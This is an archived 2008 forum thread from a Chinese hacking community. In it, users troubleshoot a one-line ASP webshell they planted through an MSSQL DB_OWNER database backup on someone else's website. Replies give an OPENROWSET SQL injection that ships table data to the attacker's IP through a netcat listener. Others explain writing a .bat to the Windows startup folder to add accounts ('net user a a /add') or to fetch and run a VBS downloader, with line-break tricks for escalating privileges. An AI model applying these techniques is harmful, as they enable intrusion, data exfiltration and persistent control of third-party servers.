邪恶八进制信息安全团队技术讨论组 » 技术讨论{ Technique Discussions } » [讨论]MSSQL  DB_OWNER权限 请教高手 [查看完整版本]

哈破boy 2008-1-11 06:41

[讨论]MSSQL  DB_OWNER权限 请教高手

议题作者：哈破boy
信息来源：邪恶八进制信息安全团队（[url]www.eviloctal.com[/url]）

MSSQL DB_OWNER 权限 ，网站路径已经找到，用工具写入了一句话木马Diy.asp。
在网站路径中也已经找到了写入的Diy.asp 。
但是，用一句话连接，就是显示该页无法显示。：（
这到底是什么原因？

我对照了网站的文件内容，和我找到的网站路径中的文件相符。
为什么我就是连不上我的一句话木马呢？

唐不狐 2008-1-13 18:21

先直接浏览器里打入地址确认 文件成功写入到web目录并且能够正确运行
几种可能：
1.目录没有脚本执行权限。假如该目录已经存在asp文件，那么这个可能可排除。
2.你找的目录不对，可能是备份目录，不是真实目录。
3.diy.asp被杀。这个的话，可以随便写点东西上去看看能不能访问得到。

fucking 2008-1-13 18:46

除了楼上说的，还有就是有可能系统自生过滤了一些比如< %这些的符号。。。考虑用容错。。或加密。。。还有你还是先检查下备份后在相应的目录有没你所备份的asp文件。。。反正情况很多。。你的描述范围很广的说~~~

dingking 2008-1-13 22:04

先本地NC一个端口，然后执行如下代码。

[code]
;insert into OPENROWSET(&#39;SQLOLEDB&#39;,&#39;uid=sa;pwd=netpatch;Network=DBMSSOCN;Address=你的IP,端口;&#39;, &#39;select * from dest_table&#39;) select * from src_table;--
[/code]

获得数据库服务器的IP，看看和WEB是一个服务器不。


[s:265]

龙歌 2008-1-14 00:09

多数是因为DB_OWNER 权限不够造成的！

dingking 2008-1-14 00:23

[quote]引用第4楼龙歌于2008-01-14 00:09发表的 :
多数是因为DB_OWNER 权限不够造成的！[/quote]


权限？都写进文件去了。说明BAK权限是有滴。。。~~~


[quote]
唐不狐:

先直接浏览器里打入地址确认 文件成功写入到web目录并且能够正确运行几种可能： 1.目录没有脚本执行权限。假如该目录已经存在asp文件，那么这个可能可排除。 2.你找的目录不对，可能是备份目录，不是真实目录。 3.diy.asp被杀。这个的话，可以随便写点东西上去看看能不能访问得到。
[/quote]

1,BAK到可以解析的目录就OK

2,很有可能......也可能是WEB和数据库分离

3, 他的dir.asp是存在的，所以应该是没被杀。

jxsaqjh 2008-1-14 11:52

很可能站库分离了

冷了左眼 2008-1-14 22:11

看看3389开了没有.如果开了直接备份一个bat 到系统启动目录下.前面加两回车.过滤掉无用的信息
bat的内容可以为开帐号.或者echo写一个VBS下载.再执行.然后.想办法让主机重启

hackwind 2008-1-14 22:28

这种情况我也遇到过。很有可能是马被杀掉的原因。

赤血狼 2008-1-16 19:44

应该WSH下看看！

miao2 2008-1-17 23:10

[quote]引用第7楼冷了左眼于2008-01-14 22:11发表的 :
看看3389开了没有.如果开了直接备份一个bat 到系统启动目录下.前面加两回车.过滤掉无用的信息
bat的内容可以为开帐号.或者echo写一个VBS下载.再执行.然后.想办法让主机重启[/quote]

“前面加两回车.过滤掉无用的信息”怎么加回车?
我备份 &#39;net user a a /add&#39; 到web目录 改名为.bat ，执行不了


输入行太长。

C:\Documents and Settings\et>net user

\\ET13 的用户帐户

--------------------------------------------------------
Administrator      et            Guest
HelpAssistant      SUPPORT_388945a0
命令成功完成。

56352351 2008-1-18 09:51

我遇到的问题和楼主差不多,
确定不是WEB数据库分离,
备分了马用列目录看了下的确好好的躺在那,
而且马的名字特别奇怪,不会有重名,
但是就是无法连接,访问的话无法显示
我遇到过好多次了,有次传了好几个马后终于成功,去目录下看以前的马都在啊,就是无法显示.我想问问这是什么原因啊?谁能回答我下,谢谢了.........没发贴权限,见谅.........

魔王的徒弟 2008-1-18 10:49

[quote]引用第4楼龙歌于2008-01-14 00:09发表的 :
多数是因为DB_OWNER 权限不够造成的！[/quote]
个人觉得是权限不够

56352351 2008-1-18 10:54

奇怪,问题是我的马放在那网站的根目录下的,他们主页我都可以浏览为什么小马就不可以.如果说是权限不够的话应该是全都不能浏览的啊

dingking 2008-1-19 13:56

不一定非要BAK马进去撒。你看看跑管理密码后台拿SHELL也行的嘛。

看看有没什么upfile.asp之类的上传文件利用下撒。~

你现在都不能确定是否是WEB和数据库分离的？

winger 2008-1-19 15:05

碰到过这个问题
不是数据过滤
也不是数据库分离
那么多网站的目录 把文件备份上去 就看着在那里就是访问不了
每这个站下面的目录都试了就是不行

是不是和数据库权限有关系
？
[s:289]

hslyao 2008-2-1 11:19

我有一个站。木录都没找到。。

是ASPX。。用ASPX暴目录工具也没有成功。。

这种能是目录分离吗。

tj646 2008-2-2 12:48

先随便备份几个字母到TXT文件看能不能访问.
很有可能目录弄错了.

黄少 2008-2-24 22:40

我碰到过，有防火墙拦截了。post不上不海洋之类的，可以试试，大牛lake2的一句话客户端。

mior 2008-2-28 17:26

mssql是以users权限启动的也会出现那样的问题

皇子 2008-2-29 19:33

[quote]原帖由 [i]miao2[/i] 于 2008-1-17 23:10 发表 [url=http://forum.eviloctal.com/redirect.php?goto=findpost&pid=107770&ptid=31904][img]images/common/back.gif[/img][/url]


“前面加两回车.过滤掉无用的信息”怎么加回车?
我备份 &#39;net user a a /add&#39; 到web目录 改名为.bat ，执行不了


输入行太长。







你insert内容到表里的时候 先写个0X0A0D 然后第一句要执行的命令 然后再加个0A0D
异词类推

join 2008-3-1 09:09

db权限可以差异备份bat到'c:\docume~1\alluse~1\「开始」菜单\程序\启动\bak.bat'文件提权

查看完整版本: [讨论]MSSQL  DB_OWNER权限 请教高手

© 1999-2008 EvilOctal Security Team